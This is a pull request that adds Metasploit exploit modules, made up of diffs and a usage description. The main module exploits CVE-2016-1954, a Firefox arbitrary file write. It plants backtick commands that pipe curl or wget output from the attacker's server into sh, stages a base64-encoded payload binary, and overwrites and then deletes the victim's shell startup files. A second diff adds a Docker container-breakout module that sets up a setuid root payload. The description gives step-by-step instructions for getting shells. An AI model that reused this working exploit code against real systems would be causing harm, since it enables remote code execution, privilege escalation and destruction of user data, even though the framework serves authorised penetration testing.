### PR TITLE
Add CVE-2016-1954, RCE on Firefox < 45.0

### DIFF
--- a/modules/exploits/linux/local/dbus_socket_container_breakout.rb
+++ b/modules/exploits/linux/local/dbus_socket_container_breakout.rb
@@ -1,0 +1,82 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'rex'
+require 'msf/core/exploit/exe'
+
+class MetasploitModule < Msf::Exploit::Local
+  Rank = ExcellentRanking
+  include Msf::Exploit::EXE
+  include Msf::Post::File
+  include Msf::Exploit::FileDropper
+
+  def initialize(info={})
+    super(update_info(info, {
+      'Name'          => 'Ubuntu Upstart Abstract Socket Container Breakout',
+      'Description'   => %q{
+        This module abuses the abstract socket used by Ubuntu's upstart system
+        to break out from root in a Docker container or chroot to root on the host.
+      },
+      'License'       => MSF_LICENSE,
+      'Author'        => ['forzoni'],
+      'DisclosureDate' => 'Jun 28 2016',
+      'Platform'      => 'linux',
+      'Arch'          => [ARCH_X86, ARCH_X86_64, ARCH_ARMLE, ARCH_MIPSLE, ARCH_MIPSBE],
+      'Targets'       => [ ['Automatic', {}] ],
+      'DefaultOptions' => { 'PrependFork' => true },
+      'SessionTypes'  => ['shell', 'meterpreter']
+      }
+    ))
+    register_advanced_options([
+      OptInt.new("ListenerTimeout", [true, "Number of seconds to wait for the exploit", 60]),
+      OptString.new("WritableDir", [true, "A directory where we can write files", "/tmp"])
+    ], self.class)
+  end
+
+  def check
+    if cmd_exec("sh -c 'docker ps; echo $?'").strip =~ /1$/
+      print_error("Failed to access Docker daemon.")
+      Exploit::CheckCode::Safe
+    else
+      Exploit::CheckCode::Vulnerable
+    end
+  end
+
+  def exploit
+    pl = generate_payload_exe
+    exe_path = "#{datastore['WritableDir']}/#{rand_text_alpha(6 + rand(5))}"
+    print_status("Writing payload executable to '#{exe_path}'")
+
+    write_file(exe_path, pl)
+    register_file_for_cleanup(exe_path)
+
+    print_status("Executing script to create and run docker container")
+    vprint_status cmd_exec("chmod +x #{exe_path}")
+    vprint_status shell_script(exe_path)
+    vprint_status cmd_exec("sh -c '#{shell_script(exe_path)}'")
+
+    stime = Time.now.to_f
+    print_status "Waiting for payload"
+    until session_created? || stime + datastore['ListenerTimeout'] < Time.now.to_f
+      Rex.sleep(1)
+    end
+  end
+
+  def shell_script(exploit_path)
+    deps = %w(/bin /lib /lib64 /etc /usr /opt) + [datastore['WritableDir']]
+    dep_options = deps.uniq.map { |dep| "-v #{dep}:#{dep}" }.join(" ")
+
+    %Q{
+      IMG=`(echo "FROM scratch"; echo "CMD a") | docker build -q - | cut -d ":" -f2`
+      EXPLOIT="chown 0:0 #{exploit_path}; chmod u+s #{exploit_path}"
+      docker run #{dep_options} $IMG /bin/sh -c "$EXPLOIT"
+      docker rmi -f $IMG
+      #{exploit_path}
+    }.strip.split("\n").map(&:strip).join(';')
+  end
+
+end
+

--- a/modules/exploits/multi/browser/firefox_report_uri_file_overwrite.rb
+++ b/modules/exploits/multi/browser/firefox_report_uri_file_overwrite.rb
@@ -3,40 +3,27 @@
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 
-require 'msf/core'
-
 class MetasploitModule < Msf::Exploit::Remote
 
-  # You have to guess the logged-in user's name.
+  # You have to guess a logged-in user's name.
   Rank = ManualRanking
 
   include Msf::Exploit::Remote::HttpServer::HTML
-  include Msf::Exploit::EXE
-  include Msf::Exploit::FileDropper
 
   def initialize(info={})
     super(update_info(info,
       'Name'        => 'Firefox report-uri File Overwrite',
       'Description' => %q{
         This module abuses an arbitrary file write vulnerability in Firefox < 45.0
-        to plant a .bashrc (or similar) file on the victim, ultimately resulting in
+        to plant a .login (or similar) file on the victim, ultimately resulting in
         a shell. The exploit causes a file to be written to the path of your choice
         containing backticks ` that allow us to execute shell commands. A curl or
         wget binary on the system is then used to stage a metasploit payload.
 
         For this module to work, you must know or guess (up to a few hundred tries)
-        the username of the logged in user. Some good paths to try are:
-
-        /home/user/.profile,
-        /home/user/.bashrc,
-        /home/user/.zshrc,
-        /home/user/.bash_aliases,
-        /home/user/.login,
-        /var/root/.profile,
-        /var/root/.login
-
-        As a warning, this module is fairly destructive and will attempt to overwrite
-        any paths specified in FILES and eventually erase them. Use with caution.
+        the username of the logged in user. As a warning, this module is fairly
+        destructive and will attempt to overwrite any paths specified in FILES
+        and eventually erase them. Use with caution.
       },
       'Author'         => [
         'Nicolas Golubovic', # vuln discoverer
@@ -60,15 +47,20 @@ class MetasploitModule < Msf::Exploit::Remote
     register_options([
       OptString.new('FILES', [
         true,
-        'List of file paths to write shell script to',
-        '/home/ubuntu/.login'
+        'Comma-separated list of file paths to drop the shell script to.',
+        %Q(
+          /home/ubuntu/.bashrc,
+          /home/user/.bashrc,
+          /var/root/.bashrc,
+          /root/.bashrc
+        )
       ]),
       OptString.new('URIPATH', [
         true,
         'Path to the exploit. This needs to be "/" for space purposes.',
         '/'
       ])
-    ], self.class)
+    ])
 
     register_advanced_options([
       OptBool.new('UseCurl', [
@@ -84,21 +76,16 @@ class MetasploitModule < Msf::Exploit::Remote
     ])
   end
 
-  def exploit
-    register_file_for_cleanup(payload_path)
-    super
-  end
-
   def on_request_uri(cli, request)
     if request.headers['User-Agent'] =~ /(curl|wget)/i
       print_good("Shell script request detected. Serving payload stager.")
-      send_response(cli, stager, 'Content-Type' => 'text/plain')
+      send_response(cli, payload.raw, 'Content-Type' => 'text/plain')
     else
       if request.qstring['file']
         path = request.qstring['file']
         print_status("Client loaded exploit for path #{path}.")
         send_response(cli, per_file_html, {
-          'Content-Security-Policy' => "script-src 'self'; report-uri file://#{path}",
+          'Content-Security-Policy' => csp_exploit(path),
           'Content-Type' => 'text/html'
         })
       else
@@ -108,39 +95,36 @@ class MetasploitModule < Msf::Exploit::Remote
     end
   end
 
+  # Here is actual vulnerability; CSP violations reported to file:/// URLs
+  # get written to disk. In Firefox, CSP violation report looks like:
+  #
+  # {"csp-report": {
+  #   "document-uri": "http://192.168.1.1:8080/",
+  #   "blocked-uri": "self",
+  #   "violated-directive": "script-src http://192.168.1.1:8080",
+  #   "script-sample": "`wget -q0- 192.168.1.1:8080|sh`"
+  # }}
+  #
+  # The "script-sample" field seems to be the only place that allows injection of
+  # shell metacharacters like backticks without URI encoding.
+  def csp_exploit(path)
+    "script-src 'self'; report-uri file://#{path}"
+  end
+
   def files
-    datastore['FILES'].split(/\s+|,/)
+    datastore['FILES'].split(/\s*,\s*|\s+/)
   end
 
   def main_html
     css = 'style="width:0;height:0;border:0"'
     frames = files.map { |f| "<iframe #{css} src='/?file=#{Rex::Text.uri_encode(f)}'></iframe>" }
-    %Q(
-      <body>#{frames.join}</body>
-    )
+    "<body>#{frames.join}</body>"
   end
 
   def per_file_html
     # This gets stuffed in the written JSON blob without URL encoding.
     cmd = datastore['UseCurl'] ? 'curl' : 'wget -qO-'
-    %Q(
-      <body><script>`#{cmd} #{datastore['SRVHOST']}:#{datastore['SRVPORT']}|sh`</script></body>
-    )
-  end
-
-  def stager
-    b64 = Rex::Text.encode_base64(generate_payload_exe)
-    %Q(
-      echo '#{b64}' | base64 -d > #{payload_path}
-      chmod +x #{payload_path}
-      #{files.map { |f| "rm -f #{f}" }.join("\n") }
-      nohup #{payload_path} 2>&1 &
-    )
-  end
-
-  def payload_path
-    @pname ||= Rex::Text.rand_text_alphanumeric(8)
-    "#{datastore['TmpDir']}/#{@pname}"
+    "<body><script>`#{cmd} #{datastore['SRVHOST']}:#{datastore['SRVPORT']}|sh &`</script></body>"
   end
 
 end

--- a/modules/exploits/multi/browser/firefox_report_uri_file_overwrite.rb
+++ b/modules/exploits/multi/browser/firefox_report_uri_file_overwrite.rb
@@ -1,0 +1,136 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class MetasploitModule < Msf::Exploit::Remote
+
+  # You have to guess the logged-in user's name.
+  Rank = ManualRanking
+
+  include Msf::Exploit::Remote::HttpServer::HTML
+  include Msf::Exploit::EXE
+  include Msf::Exploit::FileDropper
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'        => 'Firefox report-uri File Overwrite',
+      'Description' => %q{
+        This module abuses an arbitrary file write vulnerability in Firefox < 45.0
+        to plant a .bashrc (or similar) file on the victim, ultimately resulting in
+        a shell. The exploit causes a file to be written to the path of your choice
+        containing backticks ` that allow us to execute shell commands. A curl or
+        wget binary on the system is then used to stage a metasploit payload.
+
+        For this module to work, you must know or guess (up to a few hundred tries)
+        the username of the logged in user.
+
+        As a warning, this module is fairly destructive and will overwrite any paths
+        specified in FILES and eventually erase them. Use with caution.
+      },
+      'Author'         => [
+        'Nicolas Golubovic', # vuln discoverer
+        'evo'
+      ],
+      'License'     => MSF_LICENSE,
+      'Arch'           => [ARCH_X86, ARCH_X86_64, ARCH_ARMLE, ARCH_MIPSLE, ARCH_MIPSBE],
+      'Targets'        => [ ['Automatic', {}] ],
+      'Platform'      => %w{ linux osx solaris unix },
+      'DefaultTarget'  => 0,
+      'DefaultOptions' => { 'PrependFork' => true },
+      'SessionTypes'   => ['shell', 'meterpreter'],
+      'References' => [
+        ['URL', 'https://www.mozilla.org/en-US/security/advisories/mfsa2016-17/'],
+        ['URL', 'https://bugzilla.mozilla.org/show_bug.cgi?id=1243178'],
+        ['CVE', '2016-1954']
+      ]
+    ))
+
+    register_options([
+      OptString.new('FILES', [
+        true,
+        'List of file paths to write shell script to',
+        '/home/ubuntu/.bash_aliases,/home/user/.login,/var/root/.profile'
+      ]),
+      OptString.new('URIPATH', [
+        true,
+        'Path to the exploit. This needs to be "/" for space purposes.',
+        '/'
+      ])
+    ], self.class)
+
+    register_advanced_options([
+      OptBool.new('UseCurl', [
+        false,
+        'Use curl instead of wget to stage the payload.',
+        false
+      ]),
+      OptString.new('TmpDir', [
+        false,
+        'A writable temporary dir for storing the staged payload.',
+        '/tmp'
+      ])
+    ])
+  end
+
+  def exploit
+    register_file_for_cleanup(payload_path)
+    super
+  end
+
+  def on_request_uri(cli, request)
+    if request.headers['User-Agent'] =~ /(curl|wget)/i
+      print_good("Shell script request detected. Serving payload stager.")
+      send_response(cli, stager, 'Content-Type' => 'text/plain')
+    else
+      if request.qstring['file']
+        path = request.qstring['file']
+        print_status("Client loaded exploit for path #{path}.")
+        send_response(cli, per_file_html, {
+          'Content-Security-Policy' => "script-src 'self'; report-uri file://#{path}",
+          'Content-Type' => 'text/html'
+        })
+      else
+        print_status("Client loaded main page.")
+        send_response_html(cli, main_html)
+      end
+    end
+  end
+
+  def files
+    datastore['FILES'].split(/\s+|,/)
+  end
+
+  def main_html
+    frames = files.map { |f| "<iframe src='/?file=#{Rex::Text.uri_encode(f)}'></iframe>" }
+    %Q(
+      <body>#{frames.join}</body>
+    )
+  end
+
+  def per_file_html
+    # This gets stuffed in the written JSON blob without URL encoding.
+    cmd = datastore['USE_CURL'] ? 'curl' : 'wget -qO-'
+    %Q(
+      <body><script>`#{cmd} #{datastore['SRVHOST']}:#{datastore['SRVPORT']}|sh`</script></body>
+    )
+  end
+
+  def stager
+    b64 = Rex::Text.encode_base64(generate_payload_exe)
+    %Q(
+      echo '#{b64}' | base64 -d > /tmp/payload
+      chmod +x /tmp/payload
+      #{files.map { |f| "rm -f #{f}" }.join("\n") }
+      /tmp/payload
+    )
+  end
+
+  def payload_path
+    @pname ||= Rex::Text.rand_text_alphanumeric(8)
+    "#{datastore['TmpDir']}/#{@pname}"
+  end
+
+end

--- a/modules/exploits/multi/browser/firefox_report_uri_file_overwrite.rb
+++ b/modules/exploits/multi/browser/firefox_report_uri_file_overwrite.rb
@@ -49,6 +49,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'DefaultTarget'  => 0,
       'DefaultOptions' => { 'PrependFork' => true },
       'SessionTypes'   => ['shell', 'meterpreter'],
+      'DisclosureDate' => 'Mar 8 2016',
       'References' => [
         ['URL', 'https://www.mozilla.org/en-US/security/advisories/mfsa2016-17/'],
         ['URL', 'https://bugzilla.mozilla.org/show_bug.cgi?id=1243178'],
@@ -133,7 +134,7 @@ class MetasploitModule < Msf::Exploit::Remote
       echo '#{b64}' | base64 -d > #{payload_path}
       chmod +x #{payload_path}
       #{files.map { |f| "rm -f #{f}" }.join("\n") }
-      nohup #{payload_path} 2>&1 & 
+      nohup #{payload_path} 2>&1 &
     )
   end
 

--- a/modules/exploits/multi/browser/firefox_report_uri_file_overwrite.rb
+++ b/modules/exploits/multi/browser/firefox_report_uri_file_overwrite.rb
@@ -25,17 +25,25 @@ class MetasploitModule < Msf::Exploit::Remote
         wget binary on the system is then used to stage a metasploit payload.
 
         For this module to work, you must know or guess (up to a few hundred tries)
-        the username of the logged in user.
+        the username of the logged in user. Some good paths to try are:
 
-        As a warning, this module is fairly destructive and will overwrite any paths
-        specified in FILES and eventually erase them. Use with caution.
+        /home/user/.profile,
+        /home/user/.bashrc,
+        /home/user/.zshrc,
+        /home/user/.bash_aliases,
+        /home/user/.login,
+        /var/root/.profile,
+        /var/root/.login
+
+        As a warning, this module is fairly destructive and will attempt to overwrite
+        any paths specified in FILES and eventually erase them. Use with caution.
       },
       'Author'         => [
         'Nicolas Golubovic', # vuln discoverer
         'evo'
       ],
       'License'     => MSF_LICENSE,
-      'Arch'           => [ARCH_X86, ARCH_X86_64, ARCH_ARMLE, ARCH_MIPSLE, ARCH_MIPSBE],
+      'Arch'           => [ARCH_CMD],
       'Targets'        => [ ['Automatic', {}] ],
       'Platform'      => %w{ linux osx solaris unix },
       'DefaultTarget'  => 0,
@@ -52,7 +60,7 @@ class MetasploitModule < Msf::Exploit::Remote
       OptString.new('FILES', [
         true,
         'List of file paths to write shell script to',
-        '/home/ubuntu/.bash_aliases,/home/user/.login,/var/root/.profile'
+        '/home/ubuntu/.login'
       ]),
       OptString.new('URIPATH', [
         true,
@@ -104,7 +112,8 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def main_html
-    frames = files.map { |f| "<iframe src='/?file=#{Rex::Text.uri_encode(f)}'></iframe>" }
+    css = 'style="width:0;height:0;border:0"'
+    frames = files.map { |f| "<iframe #{css} src='/?file=#{Rex::Text.uri_encode(f)}'></iframe>" }
     %Q(
       <body>#{frames.join}</body>
     )
@@ -112,7 +121,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def per_file_html
     # This gets stuffed in the written JSON blob without URL encoding.
-    cmd = datastore['USE_CURL'] ? 'curl' : 'wget -qO-'
+    cmd = datastore['UseCurl'] ? 'curl' : 'wget -qO-'
     %Q(
       <body><script>`#{cmd} #{datastore['SRVHOST']}:#{datastore['SRVPORT']}|sh`</script></body>
     )
@@ -121,10 +130,10 @@ class MetasploitModule < Msf::Exploit::Remote
   def stager
     b64 = Rex::Text.encode_base64(generate_payload_exe)
     %Q(
-      echo '#{b64}' | base64 -d > /tmp/payload
-      chmod +x /tmp/payload
+      echo '#{b64}' | base64 -d > #{payload_path}
+      chmod +x #{payload_path}
       #{files.map { |f| "rm -f #{f}" }.join("\n") }
-      /tmp/payload
+      nohup #{payload_path} 2>&1 & 
     )
   end
 


### PR DESCRIPTION
This module abuses an arbitrary write vuln on Firefox < 45.0 to get a shell on many common setups. You can fit ~20 bytes inside of backticks in the overwritten file, so a `curl`/`wget` stager is used to get the full payload on to the client machine.

Let's get a shell on Ubuntu 14.0.4 by overwriting `/home/ubuntu/.bash_aliases`.
1. Run the msf module.
   
   ```
   ./msfconsole
   msf> use exploit/multi/browser/firefox_report_uri_file_overwrite
   msf> set SRVHOST <external-ip>
   msf> set LHOST <external-ip>
   msf> run -j
   ```
2. In a fresh Ubuntu 14.0.4 VM (logged in as `ubuntu` user), open Firefox and browse to the exploit URL.
3. Still in Ubuntu 14.0.4, go and open a new Terminal.
4. 💰💰💰 Shells 💰💰💰
